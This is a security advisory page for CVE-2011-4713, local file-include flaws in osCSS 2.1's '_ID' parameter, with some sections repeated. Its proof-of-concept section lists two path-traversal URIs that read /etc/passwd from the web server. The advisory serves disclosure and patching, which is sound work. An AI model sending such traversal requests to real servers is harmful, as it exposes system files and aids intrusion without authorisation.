osCSS '_ID' Parameter Multiple Local File Include Vulnerabilities
BID:50599
Info
osCSS '_ID' Parameter Multiple Local File Include Vulnerabilities
| Bugtraq ID: | 50599 |
| Class: | Input Validation Error |
| CVE: |
CVE-2011-4713 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 08 2011 12:00AM |
| Updated: | Dec 13 2011 06:28PM |
| Credit: | Stefan Schurtz |
| Vulnerable: |
osCSS osCSS 2.1 |
| Not Vulnerable: |
osCSS osCSS 2.1.1 |
Discussion
osCSS '_ID' Parameter Multiple Local File Include Vulnerabilities
osCSS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
osCSS 2.1.0 is vulnerable; other versions may also be affected.
osCSS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
osCSS 2.1.0 is vulnerable; other versions may also be affected.
Exploit / POC
osCSS '_ID' Parameter Multiple Local File Include Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd
http://www.example.com/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd
http://www.example.com/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd
Solution / Fix
osCSS '_ID' Parameter Multiple Local File Include Vulnerabilities
Solution:
Updates are available. Please see the references for more information.
Solution:
Updates are available. Please see the references for more information.
References
osCSS '_ID' Parameter Multiple Local File Include Vulnerabilities
References:
References:
- osCSS Homepage (osCSS)
- osCSS2 '_ID' parameter Local file inclusion (sschurtz)
- osCSS2 '_ID' parameter Local file inclusion (Stefan Schurtz)